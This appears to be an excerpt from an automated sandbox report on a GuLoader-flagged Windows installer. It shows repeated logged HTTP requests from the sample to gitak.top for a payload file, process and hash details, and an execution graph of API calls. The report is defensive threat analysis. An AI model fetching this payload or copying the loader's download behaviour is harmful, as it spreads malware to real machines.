                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FSMgWbpddeq%2FNvt4ouFM%2Ft8tKPaxufufFx4ue7U4Qi3HEA1ervrhFkn94kyx8AstrXZf9lon1y1gr0dWGtL0%2FbsJwUQcZC%2B88dTjCGMFKJYWGooBCqENCmkkGs%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf659ee228293-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:19 UTC | 688 | IN
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:19 UTC | 1369 | IN
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:47:19 UTC | 915 | IN
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:47:19 UTC | 6 | IN | Data Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:47:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        41 | 192.168.11.20 | 49817 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:47:29 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:29 UTC | 681 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:29 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 52
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFdsMkrc8RRA2jzkju2Dw8YfkBOYChY%2BEGc3nHm3kIXPFWw9F3UVUDtLhDBvQbwh6Wg7aerf%2FHvzGIPhbFjr8q%2BHOzwBdSezZB6%2B%2FdYhD7tu22gnwnrrCpoRlbg%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf69bfe628236-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:29 UTC | 688 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:29 UTC | 1369 | IN
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:47:29 UTC | 916 | IN
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:47:29 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        42 | 192.168.11.20 | 49818 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:47:40 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:40 UTC | 673 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:40 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 63
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TijnKBodBwojS8fKVLojY4UC1Zb7qH4Z%2BxtG9PrWXRFiC80y5FNVswJzJLm0s5U0zdJRIgFfLZocw2Ur5PB80w5E4dR3i6Lkv31RTT9IhqHycTD8v6SWJwJBJCo%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf6de0f7707fb-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:40 UTC | 696 | IN
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        43 | 192.168.11.20 | 49819 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:47:50 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:51 UTC | 675 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:51 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 74
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p6y9po9cH2nR7wTK5ZhBrQFqpL6XH8LRPJgEsXPzNxbZPFXkx604oL8xF8tKONIlMDQBjbn4NiZJ1F8%2F4MzoNkLpzMF4e%2FTLAfb3v07Zg4JJx8awOkQkv2DNogU%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf720183182b6-IAD
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        44 | 192.168.11.20 | 49820 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:48:01 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:48:01 UTC | 679 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:48:01 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 84
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkJ5muxbGh3WKoyUAuIjzC29ofOziiGvVSYbGuOiaLSxUxquXjRmKH4x0GOwL3PlJ%2BFgCW9S6PKXfKzgsUNHeYU%2BRtwomMTuu4KRYo%2BT%2FgzLC1BMk453BH0JSes%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf761c9cf588a-IAD
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        45 | 192.168.11.20 | 49821 | 172.67.207.219 | 443 | 6300 | C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-29 10:48:11 UTC | 169 | OUT | GET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:48:12 UTC | 677 | IN | HTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:48:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 95
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2aDB4%2BOqdQtNoXmdnoTwWpdHpIsfDYmEtXWW0tXRoz%2FPb0Q5QiF31cAPs8jSnMVLyadDzg%2FnEfE4a7Z5xnOSQRkMHpJMIfIhboElqhIyGydqjP9Tiraq2vao8TE%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf7a3898859bc-IAD
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co


                        Target ID:0
                        Start time:06:39:44
                        Start date:29/08/2024
                        Path:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
                        Imagebase:0x400000
                        File size:416'292 bytes
                        MD5 hash:2E620407C0B25239EF46534A34217C27
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2455393389.00000000031C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:06:40:09
                        Start date:29/08/2024
                        Path:C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"
                        Imagebase:0x400000
                        File size:416'292 bytes
                        MD5 hash:2E620407C0B25239EF46534A34217C27
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.6650157112.0000000001721000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                          Execution Graph

                          Execution Coverage:16.2%
                          Dynamic/Decrypted Code Coverage:15.2%
                          Signature Coverage:18.5%
                          Total number of Nodes:1512
                          Total number of Limit Nodes:37
4378->4523 4526 4037c0 4379->4526 4385 403562 4381->4385 4468 4038b2 4382->4468 4385->4370 4385->4379 4390 403599 4386->4390 4388 403725 4392 4037a8 ExitProcess 4388->4392 4397 406252 3 API calls 4388->4397 4389 40362f 4391 4056c4 MessageBoxIndirectW 4389->4391 4394 4035e0 4390->4394 4395 403645 lstrcatW lstrcmpiW 4390->4395 4396 40363d ExitProcess 4391->4396 4399 405a3b 18 API calls 4394->4399 4395->4379 4400 403661 CreateDirectoryW SetCurrentDirectoryW 4395->4400 4398 403734 4397->4398 4401 406252 3 API calls 4398->4401 4402 4035ec 4399->4402 4403 403684 4400->4403 4404 403679 4400->4404 4405 40373d 4401->4405 4402->4379 4524 405ee8 lstrcpynW 4402->4524 4536 405ee8 lstrcpynW 4403->4536 4535 405ee8 lstrcpynW 4404->4535 4408 406252 3 API calls 4405->4408 4410 403746 4408->4410 4412 403794 ExitWindowsEx 4410->4412 4419 403754 GetCurrentProcess 4410->4419 4411 4035fb 4525 405ee8 lstrcpynW 4411->4525 4412->4392 4415 4037a1 4412->4415 4414 405f0a 18 API calls 4416 4036c3 DeleteFileW 4414->4416 4537 40140b 4415->4537 4418 4036d0 CopyFileW 4416->4418 4425 403692 4416->4425 4418->4425 4422 403764 4419->4422 4420 403719 4423 405d82 40 API calls 4420->4423 4421 405d82 40 API calls 4421->4425 4422->4412 4423->4379 4424 405f0a 18 API calls 4424->4425 4425->4414 4425->4420 4425->4421 4425->4424 4426 405663 2 API calls 4425->4426 4427 403704 CloseHandle 4425->4427 4426->4425 4427->4425 4428->4359 4429->4361 4431 40617c 5 API calls 4430->4431 4433 403330 4431->4433 4432 40333a 4432->4368 4433->4432 4434 405933 3 API calls 4433->4434 4435 403342 CreateDirectoryW 4434->4435 4540 405b83 4435->4540 4544 405b54 GetFileAttributesW CreateFileW 4438->4544 4440 402dfd 4467 402e0a 4440->4467 4545 405ee8 lstrcpynW 4440->4545 4442 402e20 4443 40597f 2 API calls 4442->4443 4444 402e26 4443->4444 4546 405ee8 lstrcpynW 4444->4546 4446 402e31 GetFileSize 4447 402f32 4446->4447 4465 402e48 4446->4465 4448 402d18 33 API calls 4447->4448 4450 402f39 4448->4450 4449 4032f7 ReadFile 4449->4465 4452 
402f75 GlobalAlloc 4450->4452 4450->4467 4548 40330d SetFilePointer 4450->4548 4451 402fcd 4454 402d18 33 API calls 4451->4454 4453 402f8c 4452->4453 4458 405b83 2 API calls 4453->4458 4454->4467 4456 402f56 4459 4032f7 ReadFile 4456->4459 4457 402d18 33 API calls 4457->4465 4461 402f9d CreateFileW 4458->4461 4460 402f61 4459->4460 4460->4452 4460->4467 4462 402fd7 4461->4462 4461->4467 4547 40330d SetFilePointer 4462->4547 4464 402fe5 4466 403060 46 API calls 4464->4466 4465->4447 4465->4449 4465->4451 4465->4457 4465->4467 4466->4467 4467->4376 4469 406252 3 API calls 4468->4469 4470 4038c6 4469->4470 4471 4038cc 4470->4471 4472 4038de 4470->4472 4558 405e2f wsprintfW 4471->4558 4473 405db5 3 API calls 4472->4473 4474 40390e 4473->4474 4476 40392d lstrcatW 4474->4476 4478 405db5 3 API calls 4474->4478 4477 4038dc 4476->4477 4549 403b88 4477->4549 4478->4476 4481 405a3b 18 API calls 4482 40395f 4481->4482 4483 4039f3 4482->4483 4485 405db5 3 API calls 4482->4485 4484 405a3b 18 API calls 4483->4484 4486 4039f9 4484->4486 4487 403991 4485->4487 4488 403a09 LoadImageW 4486->4488 4489 405f0a 18 API calls 4486->4489 4487->4483 4493 4039b2 lstrlenW 4487->4493 4497 405960 CharNextW 4487->4497 4490 403a30 RegisterClassW 4488->4490 4491 403aaf 4488->4491 4489->4488 4494 403a66 SystemParametersInfoW CreateWindowExW 4490->4494 4495 403ab9 4490->4495 4492 40140b 2 API calls 4491->4492 4496 403ab5 4492->4496 4498 4039c0 lstrcmpiW 4493->4498 4499 4039e6 4493->4499 4494->4491 4495->4379 4496->4495 4504 403b88 19 API calls 4496->4504 4501 4039af 4497->4501 4498->4499 4502 4039d0 GetFileAttributesW 4498->4502 4500 405933 3 API calls 4499->4500 4505 4039ec 4500->4505 4501->4493 4503 4039dc 4502->4503 4503->4499 4506 40597f 2 API calls 4503->4506 4507 403ac6 4504->4507 4559 405ee8 lstrcpynW 4505->4559 4506->4499 4509 403ad2 ShowWindow LoadLibraryW 4507->4509 4510 403b55 4507->4510 4512 403af1 LoadLibraryW 4509->4512 4513 403af8 GetClassInfoW 4509->4513 4560 405265 OleInitialize 
4510->4560 4512->4513 4515 403b22 DialogBoxParamW 4513->4515 4516 403b0c GetClassInfoW RegisterClassW 4513->4516 4514 403b5b 4517 403b77 4514->4517 4518 403b5f 4514->4518 4519 40140b 2 API calls 4515->4519 4516->4515 4520 40140b 2 API calls 4517->4520 4518->4495 4521 40140b 2 API calls 4518->4521 4522 403b4a 4519->4522 4520->4495 4521->4495 4522->4495 4523->4366 4524->4411 4525->4382 4527 4037d1 CloseHandle 4526->4527 4528 4037db 4526->4528 4527->4528 4529 4037e5 CloseHandle 4528->4529 4530 4037ef 4528->4530 4529->4530 4575 40381d 4530->4575 4533 405770 71 API calls 4534 40361f OleUninitialize 4533->4534 4534->4388 4534->4389 4535->4403 4536->4425 4538 401389 2 API calls 4537->4538 4539 401420 4538->4539 4539->4392 4541 405b90 GetTickCount GetTempFileNameW 4540->4541 4542 403356 4541->4542 4543 405bc6 4541->4543 4542->4368 4543->4541 4543->4542 4544->4440 4545->4442 4546->4446 4547->4464 4548->4456 4550 403b9c 4549->4550 4567 405e2f wsprintfW 4550->4567 4552 403c0d 4553 405f0a 18 API calls 4552->4553 4554 403c19 SetWindowTextW 4553->4554 4555 40393d 4554->4555 4556 403c35 4554->4556 4555->4481 4556->4555 4557 405f0a 18 API calls 4556->4557 4557->4556 4558->4477 4559->4483 4568 404179 4560->4568 4562 405288 4566 4052af 4562->4566 4571 401389 4562->4571 4563 404179 SendMessageW 4564 4052c1 OleUninitialize 4563->4564 4564->4514 4566->4563 4567->4552 4569 404191 4568->4569 4570 404182 SendMessageW 4568->4570 4569->4562 4570->4569 4573 401390 4571->4573 4572 4013fe 4572->4562 4573->4572 4574 4013cb MulDiv SendMessageW 4573->4574 4574->4573 4577 40382b 4575->4577 4576 4037f4 4576->4533 4577->4576 4578 403830 FreeLibrary GlobalFree 4577->4578 4578->4576 4578->4578 5172 40155b 5173 40296b 5172->5173 5176 405e2f wsprintfW 5173->5176 5175 402970 5176->5175 4797 4023de 4798 402c42 19 API calls 4797->4798 4799 4023e8 4798->4799 4800 402b38 18 API calls 4799->4800 4801 4023f1 4800->4801 4802 4023fc RegQueryValueExW 4801->4802 4806 402791 4801->4806 4803 40241c 4802->4803 4804 
402422 RegCloseKey 4802->4804 4803->4804 4808 405e2f wsprintfW 4803->4808 4804->4806 4808->4804 5184 401ce5 GetDlgItem GetClientRect 5185 402b38 18 API calls 5184->5185 5186 401d17 LoadImageW SendMessageW 5185->5186 5187 4029c5 5186->5187 5188 401d35 DeleteObject 5186->5188 5188->5187 5189 40206a 5190 402b38 18 API calls 5189->5190 5191 402071 5190->5191 5192 402b38 18 API calls 5191->5192 5193 40207b 5192->5193 5194 402b38 18 API calls 5193->5194 5195 402084 5194->5195 5196 402b38 18 API calls 5195->5196 5197 40208e 5196->5197 5198 402b38 18 API calls 5197->5198 5199 402098 5198->5199 5200 4020ac CoCreateInstance 5199->5200 5201 402b38 18 API calls 5199->5201 5204 4020cb 5200->5204 5201->5200 5202 401423 25 API calls 5203 402195 5202->5203 5204->5202 5204->5203 5205 40156b 5206 401584 5205->5206 5207 40157b ShowWindow 5205->5207 5208 401592 ShowWindow 5206->5208 5209 4029c5 5206->5209 5207->5206 5208->5209 5210 4024ec 5211 4024f1 5210->5211 5212 40250a 5210->5212 5213 402b1b 18 API calls 5211->5213 5214 402510 5212->5214 5215 40253c 5212->5215 5220 4024f8 5213->5220 5216 402b38 18 API calls 5214->5216 5217 402b38 18 API calls 5215->5217 5218 402517 WideCharToMultiByte lstrlenA 5216->5218 5219 402543 lstrlenW 5217->5219 5218->5220 5219->5220 5221 402565 WriteFile 5220->5221 5222 402791 5220->5222 5221->5222 4107 40276e 4108 402b38 18 API calls 4107->4108 4109 402775 FindFirstFileW 4108->4109 4110 40279d 4109->4110 4113 402788 4109->4113 4111 4027a6 4110->4111 4115 405e2f wsprintfW 4110->4115 4116 405ee8 lstrcpynW 4111->4116 4115->4111 4116->4113 5223 4018ef 5224 401926 5223->5224 5225 402b38 18 API calls 5224->5225 5226 40192b 5225->5226 5227 405770 71 API calls 5226->5227 5228 401934 5227->5228 5229 403870 5230 40387b 5229->5230 5231 403882 GlobalAlloc 5230->5231 5232 40387f 5230->5232 5231->5232 4227 402571 4228 402b1b 18 API calls 4227->4228 4230 402580 4228->4230 4229 40269e 4230->4229 4231 4025c6 ReadFile 4230->4231 4232 405bd7 ReadFile 4230->4232 4233 4026a0 
4230->4233 4234 402606 MultiByteToWideChar 4230->4234 4236 40262c SetFilePointer MultiByteToWideChar 4230->4236 4237 4026b1 4230->4237 4231->4229 4231->4230 4232->4230 4239 405e2f wsprintfW 4233->4239 4234->4230 4236->4230 4237->4229 4238 4026d2 SetFilePointer 4237->4238 4238->4229 4239->4229 5233 4014f1 SetForegroundWindow 5234 4029c5 5233->5234 5242 4018f2 5243 402b38 18 API calls 5242->5243 5244 4018f9 5243->5244 5245 4056c4 MessageBoxIndirectW 5244->5245 5246 401902 5245->5246 4323 401df3 4324 402b38 18 API calls 4323->4324 4325 401df9 4324->4325 4326 402b38 18 API calls 4325->4326 4327 401e02 4326->4327 4328 402b38 18 API calls 4327->4328 4329 401e0b 4328->4329 4330 402b38 18 API calls 4329->4330 4331 401e14 4330->4331 4335 401423 4331->4335 4334 401e4c 4336 405192 25 API calls 4335->4336 4337 401431 ShellExecuteW 4336->4337 4337->4334 4346 4026f7 4347 4026fe 4346->4347 4349 402970 4346->4349 4348 402b1b 18 API calls 4347->4348 4350 402709 4348->4350 4351 402710 SetFilePointer 4350->4351 4351->4349 4352 402720 4351->4352 4354 405e2f wsprintfW 4352->4354 4354->4349 5266 40427b lstrlenW 5267 40429a 5266->5267 5268 40429c WideCharToMultiByte 5266->5268 5267->5268 5269 1000103d 5270 1000101b 8 API calls 5269->5270 5271 10001056 5270->5271 5272 402c7d 5273 402ca8 5272->5273 5274 402c8f SetTimer 5272->5274 5275 402cf6 5273->5275 5276 402cfc MulDiv 5273->5276 5274->5273 5277 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 5276->5277 5277->5275 5279 4014ff 5280 401507 5279->5280 5282 40151a 5279->5282 5281 402b1b 18 API calls 5280->5281 5281->5282 5283 401000 5284 401037 BeginPaint GetClientRect 5283->5284 5287 40100c DefWindowProcW 5283->5287 5285 4010f3 5284->5285 5288 401073 CreateBrushIndirect FillRect DeleteObject 5285->5288 5289 4010fc 5285->5289 5290 401179 5287->5290 5288->5285 5291 401102 CreateFontIndirectW 5289->5291 5292 401167 EndPaint 5289->5292 5291->5292 5293 401112 6 API calls 5291->5293 5292->5290 5293->5292 5294 401a00 5295 402b38 18 API calls 
5294->5295 5296 401a09 ExpandEnvironmentStringsW 5295->5296 5297 401a30 5296->5297 5298 401a1d 5296->5298 5298->5297 5299 401a22 lstrcmpW 5298->5299 5299->5297 5300 401b01 5301 402b38 18 API calls 5300->5301 5302 401b08 5301->5302 5303 402b1b 18 API calls 5302->5303 5304 401b11 wsprintfW 5303->5304 5305 4029c5 5304->5305 5306 100018c1 5307 10001243 3 API calls 5306->5307 5308 100018e7 5307->5308 5309 10001243 3 API calls 5308->5309 5310 100018ef 5309->5310 5311 10001243 3 API calls 5310->5311 5313 10001931 5310->5313 5312 10001916 5311->5312 5314 1000191f GlobalFree 5312->5314 5315 10001280 2 API calls 5313->5315 5314->5313 5316 10001aad GlobalFree GlobalFree 5315->5316 5317 404581 5318 404591 5317->5318 5319 4045b7 5317->5319 5320 40412d 19 API calls 5318->5320 5321 404194 8 API calls 5319->5321 5322 40459e SetDlgItemTextW 5320->5322 5323 4045c3 5321->5323 5322->5319 5324 405106 5325 405116 5324->5325 5326 40512a 5324->5326 5327 405173 5325->5327 5328 40511c 5325->5328 5329 405132 IsWindowVisible 5326->5329 5335 405149 5326->5335 5330 405178 CallWindowProcW 5327->5330 5331 404179 SendMessageW 5328->5331 5329->5327 5332 40513f 5329->5332 5333 405126 5330->5333 5331->5333 5337 404a5c SendMessageW 5332->5337 5335->5330 5342 404adc 5335->5342 5338 404abb SendMessageW 5337->5338 5339 404a7f GetMessagePos ScreenToClient SendMessageW 5337->5339 5340 404ab3 5338->5340 5339->5340 5341 404ab8 5339->5341 5340->5335 5341->5338 5351 405ee8 lstrcpynW 5342->5351 5344 404aef 5352 405e2f wsprintfW 5344->5352 5346 404af9 5347 40140b 2 API calls 5346->5347 5348 404b02 5347->5348 5353 405ee8 lstrcpynW 5348->5353 5350 404b09 5350->5327 5351->5344 5352->5346 5353->5350 5354 401f08 5355 402b38 18 API calls 5354->5355 5356 401f0f GetFileVersionInfoSizeW 5355->5356 5357 401f36 GlobalAlloc 5356->5357 5358 401f8c 5356->5358 5357->5358 5359 401f4a GetFileVersionInfoW 5357->5359 5359->5358 5360 401f59 VerQueryValueW 5359->5360 5360->5358 5361 401f72 5360->5361 5365 405e2f wsprintfW 5361->5365 
5363 401f7e 5366 405e2f wsprintfW 5363->5366 5365->5363 5366->5358 4103 401389 4105 401390 4103->4105 4104 4013fe 4105->4104 4106 4013cb MulDiv SendMessageW 4105->4106 4106->4105 5374 10002a4b 5375 10002a63 5374->5375 5376 100015a7 2 API calls 5375->5376 5377 10002a7e 5376->5377 5378 1000224c 5379 100022b1 5378->5379 5380 100022e7 5378->5380 5379->5380 5381 100022c3 GlobalAlloc 5379->5381 5381->5379 5382 404b0e GetDlgItem GetDlgItem 5383 404b60 7 API calls 5382->5383 5386 404d79 5382->5386 5384 404c03 DeleteObject 5383->5384 5385 404bf6 SendMessageW 5383->5385 5387 404c0c 5384->5387 5385->5384 5393 404e5d 5386->5393 5397 404a5c 5 API calls 5386->5397 5410 404dea 5386->5410 5388 404c43 5387->5388 5391 405f0a 18 API calls 5387->5391 5389 40412d 19 API calls 5388->5389 5392 404c57 5389->5392 5390 404f09 5394 404f13 SendMessageW 5390->5394 5395 404f1b 5390->5395 5396 404c25 SendMessageW SendMessageW 5391->5396 5398 40412d 19 API calls 5392->5398 5393->5390 5399 404eb6 SendMessageW 5393->5399 5425 404d6c 5393->5425 5394->5395 5402 404f34 5395->5402 5403 404f2d ImageList_Destroy 5395->5403 5411 404f44 5395->5411 5396->5387 5397->5410 5416 404c65 5398->5416 5405 404ecb SendMessageW 5399->5405 5399->5425 5400 404194 8 API calls 5406 4050ff 5400->5406 5401 404e4f SendMessageW 5401->5393 5407 404f3d GlobalFree 5402->5407 5402->5411 5403->5402 5404 4050b3 5412 4050c5 ShowWindow GetDlgItem ShowWindow 5404->5412 5404->5425 5409 404ede 5405->5409 5407->5411 5408 404d3a GetWindowLongW SetWindowLongW 5413 404d53 5408->5413 5420 404eef SendMessageW 5409->5420 5410->5393 5410->5401 5411->5404 5424 404adc 4 API calls 5411->5424 5429 404f7f 5411->5429 5412->5425 5414 404d71 5413->5414 5415 404d59 ShowWindow 5413->5415 5434 404162 SendMessageW 5414->5434 5433 404162 SendMessageW 5415->5433 5416->5408 5419 404cb5 SendMessageW 5416->5419 5421 404d34 5416->5421 5422 404cf1 SendMessageW 5416->5422 5423 404d02 SendMessageW 5416->5423 5419->5416 5420->5390 5421->5408 5421->5413 5422->5416 
5423->5416 5424->5429 5425->5400 5426 405089 InvalidateRect 5426->5404 5427 40509f 5426->5427 5430 404976 21 API calls 5427->5430 5428 404fad SendMessageW 5432 404fc3 5428->5432 5429->5428 5429->5432 5430->5404 5431 405037 SendMessageW SendMessageW 5431->5432 5432->5426 5432->5431 5433->5425 5434->5386 5435 100016ce 5436 100016fd 5435->5436 5437 10001b3e 24 API calls 5436->5437 5438 10001704 5437->5438 5439 10001717 5438->5439 5440 1000170b 5438->5440 5442 10001721 5439->5442 5443 1000173e 5439->5443 5441 10001280 2 API calls 5440->5441 5449 10001715 5441->5449 5446 10001555 3 API calls 5442->5446 5444 10001744 5443->5444 5445 10001768 5443->5445 5447 100015cc 3 API calls 5444->5447 5448 10001555 3 API calls 5445->5448 5450 10001726 5446->5450 5451 10001749 5447->5451 5448->5449 5452 100015cc 3 API calls 5450->5452 5453 10001280 2 API calls 5451->5453 5454 1000172c 5452->5454 5455 1000174f GlobalFree 5453->5455 5456 10001280 2 API calls 5454->5456 5455->5449 5457 10001763 GlobalFree 5455->5457 5458 10001732 GlobalFree 5456->5458 5457->5449 5458->5449 5459 404910 5460 404920 5459->5460 5461 40493c 5459->5461 5470 4056a8 GetDlgItemTextW 5460->5470 5463 404942 SHGetPathFromIDListW 5461->5463 5464 40496f 5461->5464 5466 404959 SendMessageW 5463->5466 5467 404952 5463->5467 5465 40492d SendMessageW 5465->5461 5466->5464 5468 40140b 2 API calls 5467->5468 5468->5466 5470->5465 5471 401491 5472 